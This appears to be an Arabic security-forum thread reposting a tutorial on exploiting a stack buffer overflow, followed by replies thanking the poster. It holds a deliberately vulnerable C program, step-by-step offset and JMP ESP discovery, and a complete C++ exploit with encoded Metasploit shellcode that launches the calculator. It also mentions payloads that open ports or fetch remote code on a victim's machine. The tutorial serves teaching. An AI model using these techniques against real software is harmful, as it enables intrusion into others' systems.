شرح ثغرات فيض المكدس - Stack OverFlow Exploitation درس بالعربي + فيديو تطبيقي

LAV4 · 07-24-2009, 02:13 AM

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اللهم صلِّ على محمد وآل محمد

ذا اول درس اكتبه عن ثغرات الفيض Stack buffer OverFlow

وساشرح فيه ان شاء الله كيفية اكتشافها واستغلالها بنوع من التفصيل ان شاء الله
يلا بدون التكثير في الكلام نبدا ببسم الله
اولا نبدا بالاكتشاف

اكتشافها اسهل بكثير من استغلالها بحيث نقوم بارسال كمية كبيرة من البيانات عبر احد المداخل "inputs" اي كل ما يسمح لنا بادخال بيانات الى البرنامج فاذا ضهر لنا خطا فان البرنامج مصاب بثغرت فيض واذا لم يضهر فانه غير مصاب

ملاحضة : في بعض الاحيان يكون البرنامج مصاب ولكن يكون فيه كود للحماية ككود نقل التنفيذ الى كود اخر يضهر رسالة خطا دون التسبب في اغلاق البرنامج
وهذا سيجعل البعض يضن ان البرنامج غير مصاب وهذا غير صحيح
وفي هذه الحالة يمكننا اكتشاف الثغرة فقط بتتبع البرنامج باحد برامج التنقيح
تانيا الاستغلال

ربما سيكون هذا الجزء هو الاصعب ولكن ليس بعد ان تعرف اساسيات حدوث الفيض، لذا لاسهل علي الشرح واسهل عليك الفهم سابدا اولا بتعريف وتوضيح كل ما هو اساسي لاستغلال ثغرات الفيض :

1 المسجلات "Registers"

المسجلات هي مكان في بروسيسر الجهاز الذي يقوم بعمليات الحاسب الالي

2 مسجل الستاك "stack register"

هو مسجل يستعمل ليسهل على وحدة المعالجة المركزية التعامل مع داكرة النضام التي يكون البرنامج محملا عليها

3 المسجلات EIP - ESP

ESP
يشير دائما الى التعليمة التي تاتي بعد الكود المنفذ في الstack

لهذا يكتب الشل كود بعد عنوان العودة لتسهيل معرفة مكانه في الذاكرة

EIP
هو مسجل يخزن فيه عنوان التعليمة التي تاتي مبشرة بعد اي تعليمة تدهب بالتنفيد الى كود داخل الكود الرئيسي

ولفهم هذا الامر فلنرجع الى تعريف برنامج

البرنامج "Logiciel" هو مجموعة من البرانم "Programmes" كل برنام له عمل خاص

وهذه صورة موضحه

كما ترون في الحقيقة البرنامج هو الجزء الرئيسي زائد الاجزاء الفرعية التي تسمى بالبرانم وهي تقوم بعمل وحيد فقط مثلا كود اغلاق الجهاز هو برنام واذا اردنا اطفاء الجهاز عن طريق زر في برنامج نضع في كود دلك الزر امر لاستدعاء هذا البرنام ليقوم بدوره باطفاء الجهاز

مثال اخر :
في الصورة اعلاه وبالضبط الزر "اضهار رسالة",,عندما نضغط عليه فان البرنامج يقوم باستدعاء البرنام المسؤول عن اضهار رسالة ويمرر التنفيذ اليه فنصبح الان خارج البرنامج الرئيسي وذاخل برنامج فرعي يقوم باضهار الرسالة

وعند ضهور الرسالة تكون مهمة البرنامج الفرعي قد انتهت وبذلك يمرر التنفيذ للبرنامج الرئيسي مرة اخرى

لنوضح اكثر بهذه الصورة

لا شك ان صورة كيفية وقوع الفيض بدات تتضح لديك

ان استطعنا ان نغير عنوان العودة فاننا قد ندهب بالتنفيذ الى اي مكان نريده

مثلا ان ندهب بالتنفيذ الى عنوان الشل كود

دعني اوضح لك اكثر
عندما يحجز المبرمج متغير ما فان حالة الstack تكون كالتالي

كود:


buffer | 41414141
| 41414141
return addr | 004012A1

يعني اذا لم يقم المبرمج بالتاكد من طول البيانات المدخلة و طول المتغير

فان ادخال بيانات طويلة سيمكننا من الكتابة فوق عنوان العودة ليصبح الستاك كالتالي

كود:



buffer | 41414141
| 41414141
return addr | 41414141

A = 41 اذا حولناه الى قيم الهكس

فكل ما ندخله الى البرنامج

يحول الى قيم هيكس يعني لا يحفض كما هو فلو اذخلنا الى برنامج ABCD

41 42 43 44

بحيث

A = 41
B = 42
C = 43
D = 44

ويكتبها بالمقلوب

DCBA
قد تلاحظ اننا دخلنا مباشرة في الاستغلال ولكن لا تقلق سنبصط اكثر واكثر حتى يصبح الدرس اسهل وفي متناول الجميع
لنستمر في شرح الاساسيات
4 الشل كود "shellcode"
الشل كود عبارة عن برنامج/برنام مكتوب بطريقة احترافية تخوله للعمل في اي نضام دون الحاجة الى اي برنامج اخر (مترجم) وهذه الخاصية هي الاهم وهي التي تجعلنا نضع الشل كود في الثغرات لانه كما تعلم عندما تخترق عن بعد لا يمكنك ارفاق مترجم مع البرنامج بل تحتاج برنامج جاهز ما ان يصل الى الذاكرة يصبح قابل للتنفيذ .
الان وبعد ان فهمنا الاساسيات دعونا نقوم بخطوة لنتقدم بالموضوع الى الامام
وهي تلخيص فكرة كتابة استغلال ثغرة فيض المكدس :
ليحدث فيض يجب ان يكون لدينا متغير ذو حجم معين مثلا 260 بايت يجب علينا ادخال كمية كبيرة من المعلومات اي مثلا لو ادخلنا 270 فالبرنامج قادر فقط على تخزين 260 حرف و 10 احرف المتبقية فلا مكان لها بل سيكتبها فوق كل ما هو موجود بعد المساحة المحددة من طرف البرنامج وكما تعلمون عنوان العودة يكون ايضا بعد هذه المساحة اذن هكذا سيتم الكتابة فوقه وهكذا سنتحكم في البرنامج وذلك بتغيير عنوان العودة الى اي عنوان نريده
الان عرفنا كيف نتحكم في سير البرنامج اي فهمنا كيف نغير عنوان العودة
ماذا بعد ؟

تحدثت لنا على الشلكود وقلت انه يكتب ايضا في الذاكرة وللوصول الى هدفنا (وهو تنفيد الشلكود في جهاز الضحية) كيف سنعرف مكان هذا الشل كود ؟ او كيف نعرف عنوانه لكي نقوم بكتابته فوق عنوان العودة ؟

الجواب هو :

عند ادخال الشل كود الى البرنامج يكون على الشكل التالي

AAAAAAAA+عنوان العودة+shellcode

ويصبح بعد كتابته في الذاكرة

buffer (A's) | 41414141
41414141 |
عنوان العودة| عنوان العودة الجديد
الشل كود | الشل كود يوجد مباشرة بعد عنوان العودة

وهنا ياتي دور المسجل ESP راجع تعريفه "ضروري"

اكيد عرفتها قلنا انه هذا المسجل يسجل عنوان التعليمة التي بعد التعليمة المنفذة

وفي حالتنا هذه التعليمة المنفذة هي retn

اي العودة الى عنوان العودة وبما ان الشل كود موجود مباشرة بعدها هذا يعني ان العنوان المخزن بالمسجل ESP هو عنوان الشل كود

لذا لكي ننفذ الشل كود او لننقل التنفيذ اليه يجب علينا البحث عن قفزة للمسجل ESP

صورة تبسيطية :

ضنك الان فهمت كيف ينفذ الشل كود (ان لم تفهم اعد القراءة "تساعد على الفهم اكثر") .

قذ تلاحظ ان هذا الجزء كله نضري ولن ادعك تقول هذا في رد بل سننتقل الان الى الجزء التطبيقي من الدرس

سنقوم بكتابة استغلال لبرنامج مصاب بثغرة فيض طبعا نحن من سيقوم بكتابته وبلغة سي ثم نقوم بعمل اكسبلويت له ان شاء الله

يلا نبدا ببسم الله

هذا هو سورس كود برنامجنا التطبيقي

كود PHP:

       #include <stdio.h>
#include <string.h>
void overflow_function (char *str)
{
char buffer[256];
strcpy(buffer, str); 
}
int main(int argc, char **argv)
{
overflow_function(argv[1]);
return 0;
}

يجب عليك ترجمته بمترجم مايكروسوفت لضمان ان تكون النتائج مطابقة بين الشرح وتطبيقك

"Visual C++ 6.0"

كما ترى اكواد بسيطة جدا ولكن لاباس بشرحها

كما ترى الدالة التي يحدث فيها الخطا هي دالة strcpy

حيث يتم نقل محتوى المتغير str الى المتغير buffer

وعليه اذا كان حجم المتغير str اكبر من 256 فانه سيتم الكتابة فوق عنوان العودة

هيا بنا فلنبدا بمعرفة هل البرنامج مصاب ام لا

بعد ترجمته شغله انطلاقا من الدوس ومرر اليه سلسلة من الحروف كبيرة

ولتكن 300A

اي الحرف A 300 مرة

كما تلاحظ ضهو الخطا معناه ان البرنامج مصاب

الان انتهت مرحلة الكشف عن الخطا وجاء دور كتابة الاستغلال ( هو سهل فقط شوية تركيز

اول خطوة يجب القيام بها هو تحديد كم عدد من البيتات تلزمنا قبل ان نصل الى عنوان العودة يعني من بداية البفر الى اخر بايت قبل عنوان العودة

ولعمل هذا نقوم بادخال سلسلة من الاحرف مختلفة الى البرنامج ويفضل ان تكون هاش

استعن بهذا الموقع وشفر مجموعة كلمات مختلفة ثم اجمع الهاشات فما بينها حتى تحصل على 300 بايت

كود:


     
                            http://www.spijoprod.net/outils/md5.php

كود PHP:

       3691308f2a4c2f6983f2880d32e29c8403c7c0ace395d80182db07ae2c30f0345d41402abc4b2a76b9719d911017c592ce57579e09df9aa67e82a9552789b1f14d4098d64e163d2726959455d046fd7cded9fd7fac6bfe771195dc39cd7644c72035a61774315c394238af637e64a30e2035a61774315c394238af637e64a30e6ba667f2e5fb6e2e9a9edd14f49a3d5312e24270d85b

تح البرنامج المصاب بالمنقح اولي ollydbg ومرر اليه سلسلة الاحرف وذلك باختيار argument من قائمة debug

ثم انتر ثم اضغط على ctrl+f2 ثم اختر يس ليعاد تحميل البرنامج

بعد دلك اضغط على F9 ليتم تشغيل البرنامج

والنتيجة رسالة خطا

اضغط انتر
ثم قم بعمل كما في الصورة التالية

عد دلك عد الى السلسلة التي ادخلناها وقم بالبحث عن تلك الحروف والارقام التي قلت لك احفضها في الصورة اعلاه وستكون النتيجة كالتالي

قم بمسح 67f2 وكل ماياتي بعدها ليكون عدد البيتات الباقي هو 260

وهكذا نكون قد حددنا حجم البفر
الخطوة التانية هي البحث عن عنوان العودة المناسب وللقيام بهذا العمل يلزمنا برنامج اسمه findjmp
ووضيفته هي اجاد اي قفزة للمسجل esp وبالتالي يتم تنفيذ الشل كود

حمل من هنـا

فك الضغط عنه وضعه في القرص c: ثم شغله من الدوس وافعل كما في الصورة

بعد ان احصلنا على عنوان القفزة فلنعدل عليه كما يلي
0x7C86379E
اقلب ترتيب كل عددين ليصبح
9E 37 86 7C
الان اضف اليه x\ ليصبح
\x9E\x37\x86\x7C
الان انتهينا من اعداد عنوان العودة الجديد
والخطوة التالية هي اعداد الشل كود الذي نريده
فكما تعلمون هناك شل كودات كثيرة حسب عملها فهناك منها من يقوم بتشغيل الحاسبه وهذا هو الذي يستعمل عند مكتشفي الثغرات لكي يجربو نجاح الثغرة
وهناك شل كود لفتح منفذ او تحميل باتش وتشغيله في جهاز الضحية
هيا بنا اذن فلنقم بانشاء شل كود للتجربة فقط وهو شل كود بعد تنفيذ الثغرة يشغل لنا الالة الحاسبة المرفقة مع الوندوز
ولهذا الغرض نستعين بالله و بموقع ميتاسبلويت
وهو

كود PHP:

http://www.m e t asploit.com:55555/PAYLOADS?FILTER=win32

(الفراغات بسبب التشفير)

ازل الفواصل بين كلمة ميتا
ثم اختر تنفيد الاوامر
windows excute command
ثم

سينتج لنا شل كودين
اختر الاول كما في الصورة ( لا تنسى اي شيء والا لن يعمل الاكسبلويت )

لان اصبح كل شيء جاهزا وبقي فقط كتابة الاكسبلويت
ويمكننا فعل ذلك باية لغة برمجة مثلا c++ او c او بيرل او بيتون ...الخ
انا ساستخدم لغة c++
المهم قبل فعل هذا دعني اوضح لك فكرة عمل الاستغلال فمن فهم الفكرة سيستطيع كتابة استغلاله باي لغة اراد
اولا لكي تنفذ الثغرة ويتم تشغيل الحاسبة يجب علينا تمرير سلسلة حروف لملء البفر + عنوان القفزة + الشلكود
junkdata+return address+shellcode
اذن الاكسبلويت سيقوم بجمع كل هذه الاشياء ثم يشغل البرنامج المصاب ويمرر اليه هده السلسلة
(اي كود الاستغلال junkdata+return address+shellcode )

هذا هو كود الاستغلال

كود:

كود PHP:

       #include <windows.h>
#include <string.h>
#include <stdio.h>
int main()
{
//file name
char exploit[700]="vuln.exe "; 
//ret addr
char ret[] = "\xC0\x68\x83\x7C";
//junk data
char overflow[260];
for(int i=0;i<260;i++){
overflow[i]=0x41;
}
/*
* windows/exec - 144 bytes
* http://www.****sploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
char shellcode[] =
"\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\xd9\x74\x24\xf4"
"\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\x79\x91\x3f\x98"
"\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\xc6\x45\x51\x53"
"\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\xa9\xd9\x9c\xa4"
"\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\x86\x84\x74\x12"
"\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\x6b\x42\x0a\x36"
"\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\x40\x4c\x0e\xfa"
"\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\xe1\x1a\x66\xdf"
"\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\xf8\xee\x94\x48"
"\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";
printf("Exploiting ......\n");
strcat(exploit, overflow);
strcat(exploit, ret);
strcat(exploit, shellcode);
WinExec(exploit,0);
printf("Exploitation Finished\n");
return 0;
}

ترجمه وضعه في نفس المجلد الذي وضعت فيه البرنامج المصاب ثم شغله والنتيجة هي اشتغال الالة الحاسبة

وهذا فيديو تطبيقي من صاحب الموضوع الأصلي :

كود PHP:

  http://www.ouatmane.org/mr-cracker.rar

وياليت اننا نتعمق شوي في الميتاسبلويت والشل كود
وطبعا البفر فلو هي من اساسيات الثغرات المستخدمه فيها

ولا ننسى طبعا بأمكان الشخص تحويل كل ذلك في الاختراق المستهدف

والصلات والسلام على سيدنا محمد صلى الله عليه وسلم

للامانه الموضوع منقول

المصدر: :: vBspiders Professional Network ::

avp eyvhj tdq hgl;]s - Stack OverFlow Exploitation ]vs fhguvfd + td]d, j'fdrd

ابو بدر · 07-24-2009, 11:42 AM

موضوع ممتاز
تااااااابع تقدمك يالغالي >>>>>>>>>>>>>>ولو بموضوع منقوول

KaLa$nikoV · 07-24-2009, 11:43 AM

ما شاء الله رائع والله

بارك الله فيك
تسلم يمينك

عصام-محمد · 07-25-2009, 12:09 AM

بارك الله فيك

LAV4 · 07-25-2009, 10:52 AM

شكرا إلكم كتير على المرور نورتو الموضوع

DON'T CRY · 08-05-2009, 07:35 PM

يعطيك العافيه اخوي وبارك الله فيك

KaLa$nikoV · 01-26-2010, 12:34 AM

up

ThE BiGeSt JoKeR · 01-27-2010, 09:53 PM

شكرا لك على الموضوع الراائع .. ^^
الى الامام

Cyber Code · 01-28-2010, 07:44 PM

مشكور حبيبي إلا الامام وبارك الله فيك

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
شرح فيديو:simple remote buffer over... exploitation	data$hack	Penteration Testing Training	16	12-20-2009 07:08 PM
ممكن Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)	Evil.Man	جـــ'ابات العناكــ'ب	0	09-01-2009 11:52 PM
إستغلآل ثغرآت الـ Local stack overflow Poc	Red-D3v1L	قســم إختــراق الأجهــزة	4	08-18-2009 10:07 PM
شرح تركيب VBSEO 3.3.0 بدون مشكلة stack overflow at line	xman2	قســم تطويــر المــــواقع	0	05-18-2009 08:30 PM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

شرح ثغرات فيض المكدس - Stack OverFlow Exploitation درس بالعربي + فيديو تطبيقي

Buffer OverFlow